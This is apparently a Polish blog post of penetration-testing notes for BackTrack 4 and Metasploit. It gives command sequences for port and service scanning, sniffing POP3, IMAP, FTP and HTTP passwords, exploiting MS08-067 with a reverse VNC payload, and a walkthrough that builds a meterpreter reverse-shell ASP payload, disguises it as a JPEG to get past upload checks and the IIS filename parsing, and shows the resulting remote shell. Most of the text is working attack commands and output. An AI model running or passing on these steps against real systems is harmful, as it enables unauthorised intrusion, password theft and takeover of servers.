BT4
- skanowanie podsieci porty 80
./pentest/exploits/framework3/msfconsole
use scanner/portscan/syn
set PORTS 80
set RHOSTS 192.168.0.0/24
set THREADS 10
run
- wersja systemu
use scanner/smb/version
- MSSQL
use scanner/mssql/mssql_ping
- skanowanie idle
use scanner/ip/ipidseq
- skanowanie ssh
use scanner/ssh/ssh_version
- anonimowe FTP
use scanner/ftp/anonymouse
- SNMP
use scanner/snmp/community
- podsłuchiwanie haseł pop3,imap,ftp,http
use auxiliary/sniffer/psnuffle
- przejęcie komputera z WINDOWS
use windows/smb/ms08_067_netapi
set RHOST 10.32.1.171 - cel
set lhost 10.32.1.85 - napastnik
set payload windows/vncinject/reverse_tcp
exploit
-----------------------------------------------------------------------------------------------
Do wygenerowania złośliwego kodu ASP posłużą nam następujące polecenia:
msfpayload windows/meterpreter/reverse_tcp \
LHOST=10.20.30.40 LPORT=8443 R | \
msfencode -t asp -o atak.asp
$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 10.20.30.40
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j
Po utworzeniu listenera oczekującego na połączenie, możemy już utworzyć testowy plik w jego ostatecznej postaci, za pomocą polecenia:
cat saint.jpg atak.asp > "atak.asp;.jpg"
Jak widać, nasz skrypt został połączony z plikiem JPG (w celu oszukania mechanizmów sprawdzania zawartości pliku) oraz nazwany atak.asp;.jpg (co pozwala na wykorzystanie właściwej luki serwera IIS w sposobie interpretacji nazw plików).
Teraz pozostaje już tylko załadowanie naszego pliku na serwer poprzez odpowiedni formularz (odpowiednia nazwa oraz zawartość graficzna pozwolą na obejście podstawowych mechanizmów zabezpieczających), a następnie wyświetlenie strony internetowej zawierającej załadowany uprzednio plik. Jeśli katalog do którego trafił nasz plik dysponuje prawami wykonania, złośliwy skrypt ASP zostanie wykonany. To z kolei spowoduje nawiązanie połączenie z przygotowanym wcześniej listenerem:
[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened
Następnie, po wydaniu w konsoli listenera polecenia:
msf exploit(handler) > sessions -i 1
oraz w kolejnej konsoli polecenia:
meterpreter > shell
otrzymamy ostatecznie wiersz poleceń docelowego serwera:
Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\serwer>
-----------------------------------------------------------------------------------------------
http://www.hcsl.pl/2010/03/wamanie-do-win-xp-sp3-poprzez-ie.html
-----------------------------------------------------------------------------------------------
http://www.hcsl.pl/search/label/Testy%20penetracyjne
-----------------------------------------------------------------------------------------------
Brak komentarzy:
Prześlij komentarz